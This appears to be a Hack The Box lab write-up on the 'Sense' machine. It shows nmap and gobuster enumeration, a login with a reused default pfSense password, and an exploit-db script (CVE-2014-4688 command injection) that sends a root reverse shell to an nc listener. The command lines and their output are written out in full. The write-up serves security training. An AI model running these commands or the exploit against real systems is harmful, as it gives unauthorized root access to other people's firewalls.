# HTB - Sense

![Sense](/files/-M4SPkizDt-0F6XzLlzj)

## Getting Root

1. **gobuster** turned up a plain-text file, **`/system-users.txt`**, which named a user **rohit**
2. The pfSense default password **pfsense** had been reused for that user, which got us into the admin panel
3. The dashboard showed pfSense **2.1.3**; **searchsploit** found the matching exploit-db Python exploit (an authenticated command injection), which returned a root shell directly because the pfSense web GUI runs as root

### Tools Used:

**`nmap, gobuster, searchsploit`**

## Nmap

```
# Nmap 7.80 scan initiated Fri Mar 20 19:14:58 2020 as: nmap --script vuln -p 80,443 -oA nmap/Sense 10.10.10.60                                                                               
Nmap scan report for 10.10.10.60                                                                                                                                                              
Host is up (0.054s latency).                                                                                                                                                                  
                                                                                                                                                                                              
PORT    STATE SERVICE                                                                                                                                                                         
80/tcp  open  http                                                                                                                                                                            
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                               
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                                                          
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                         
|_http-passwd: ERROR: Script execution failed (use -d to debug)                                                                                                                               
| http-slowloris-check:                                                                                                                                                                       
|   VULNERABLE:                                                                                                                                                                               
|   Slowloris DOS attack                                                                                                                                                                      
|     State: LIKELY VULNERABLE                                                                                                                                                                
|     IDs:  CVE:CVE-2007-6750                                                                                                                                                                 
|       Slowloris tries to keep many connections to the target web server open and hold                                                                                                       
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                                        
|       the target web server and sending a partial request. By doing so, it starves                                                                                                          
|       the http server's resources causing Denial Of Service.                                                                                                                                
|                                                                                                                                                                                             
|     Disclosure date: 2009-09-17                                                                                                                                                             
|     References:                                                                                                                                                                             
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                                                                                                                          
|_      http://ha.ckers.org/slowloris/                                                                                                                                                        
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 
443/tcp open  https                                                                                                                                                                           
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                               
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)                                                                                                                         
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                                                          
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                         
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                              
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)                                                                                                                    
| ssl-ccs-injection:                                                                                                                                                                          
|   VULNERABLE:                                                                                                                                                                               
|   SSL/TLS MITM vulnerability (CCS Injection)                                                                                                                                                
|     State: VULNERABLE                                                                                                                                                                       
|     Risk factor: High                                                                                                                                                                       
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h                                                                                                                  
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.cvedetails.com/cve/2014-0224 
|       http://www.openssl.org/news/secadv_20140605.txt
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Non-safe prime
|             Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org

```

## Enumeration

### Gobuster

```bash
/index.html (Status: 200)
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/status.php (Status: 200)
/system.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)

```

Checking **`/changelog.txt`**

![](/files/-M4STOiU9mbUMyrO0k3f)

Checking **`/system-users.txt`**

![](/files/-M4SThGQPzYHFe002JwV)

That gives us the username **rohit**. pfSense ships with the default credentials **admin** / **pfsense**, and a quick search confirms the default password; here it has simply been reused for the **rohit** account.

Logging in as **rohit** / **pfsense** works, and the dashboard shows that the pfSense version is **2.1.3**

![](/files/-M4SUErkH9K4X6tqCGSQ)

Using searchsploit we find **`exploits/php/webapps/43560.py`**, the pfSense < 2.1.4 `status_rrd_graph_img.php` authenticated command-injection exploit (CVE-2014-4688). It needs valid credentials, which we already have.

![](/files/-M4SUg-bjv0k3cKona-M)

## Privilege Escalation

Start a listener on port 9001 first (shown below), then run the exploit with the credentials found above; `--lhost`/`--lport` point at our listener, and the script fetches the CSRF token itself:

```bash
# python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.55 --lport 9001 --username rohit --password pfsense  
CSRF token obtained
Running exploit...
Exploit completed

```

We get a shell as root straight away. There is no separate privilege-escalation step on this box: the pfSense web GUI runs as root, so a command injection in it executes as root.

```bash
# rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.60.
Ncat: Connection from 10.10.10.60:60055.
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# 

```

